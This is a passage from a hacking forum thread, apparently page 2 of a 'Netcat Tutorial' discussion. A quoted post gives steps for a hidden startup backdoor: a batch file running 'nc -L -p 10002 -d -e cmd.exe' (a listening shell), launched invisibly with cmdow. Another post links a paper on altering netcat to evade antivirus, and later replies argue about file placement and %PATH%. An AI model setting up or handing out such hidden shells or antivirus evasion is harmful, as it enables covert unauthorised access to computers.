Page 2 of 4 FirstFirst 1234 LastLast

Thread: Netcat Tutorial

Just burned his ISO

Quote Originally Posted by Fletch View Post
    " Even the crappiest antivirus can detect netcat so its only useful for a one shot deal where you don't care if your attack is logged."
    A good article on how to avoid AV detection by altering Netcat"s signature can be found at :
    http://packetstormsecurity.org/paper...ack_Netcat.pdf

Fletch
    This is a great tut! Thanks! Assembly is a bit on the harder side
    I had rather be hated for what I am, than loved for what I'm not

Just burned his ISO

Quote Originally Posted by -`Joseph`- View Post
    I
    Running netcat on startup hidden [/B]
    Make a batch file with the command "nc -L -p 10002 -d -e cmd.exe" in it. Name this file start.bat and place it the root of your C drive. Download the program cmdow.exe. Make a batch file and name it hide.bat. Inside the file type "cmdow /RUN /HID C:\start.bat". Place this file inside the startup folder.
    Now everytime the computer boots netcat will start hidden.
    ]
    what do you do with the cmdow.exe ??? do you also put it in the startup folder???
    thank you

Please use some common sense. If you don't know where to put it do some research and learning about how Windows works.
    Tiocfaidh ár lá

Or simply don't play with things you don't comprehend.
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

Quote Originally Posted by thorin View Post
    Or simply don't play with things you don't comprehend.
    Just wanted to say it polite
    Tiocfaidh ár lá

Very good friend of the forum killadaninja's Avatar

Quote Originally Posted by fige86 View Post
    what you do with the cmdow.exe ??? do you also put it in the startup folder???
    thank you
    Im trying not to say anything so ill just say yes put it in your start folder, theres a good boi
    Sometimes I try to fit a 16-character string into an 8–byte space, on purpose.

Quote Originally Posted by KMDave View Post
    Just wanted to say it polite
    You're right, I should have been nicer.

@fige86 if you want something to execute then it needs to be in your execution %PATH%.

Quote Originally Posted by killadaninja View Post
    Im trying not to say anything so ill just say yes put it in your start folder, theres a good boi
    Actually I think you're wrong. Looking at the instructions quoted if he put cmdow in the start folder it would then run once as itself (uselessly) and once from hide.bat (which is actually what the original instructions are trying to suggest be placed in the startup folder...IMHO).
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

Quote Originally Posted by thorin View Post
    Actually I think you're wrong. Looking at the instructions quoted if he put cmdow in the start folder it would then run once as itself (uselessly) and once from hide.bat (which is actually what the original instructions are trying to suggest be placed in the startup folder...IMHO).

Thorin it was sarcasm the point was research or try it, now after looking at these instructions quickly

"Make a batch file and name it hide.bat. Inside the file type "cmdow /RUN /HID C:\start.bat". Place this file inside the startup folder."

the hide script just invokes cmdow to run the start.bat so I disagree with you
    cmdow.exe would have to be in the same folder as hide.bat ie the startup folder as there is no path within hide.bat to reference cmdow.exe
    if you were to want to put cmdow.exe in another folder lets say thorinsprograms the hide.bat would then look like this

C:\thorinsprograms\cmdow /RUN /HID C:\start.bat

sigh

%PATH% is a global environment variable it's available for all command shells.

Open a command prompt and try:
    Code:
    echo %PATH%

Thorin your way more knowledgeable on windows batch scripts than me, are you trying to say any batch script in the start up folder wouldnt need a file path to execute a program in the root of c:?

Page 2 of 4 FirstFirst 1234 LastLast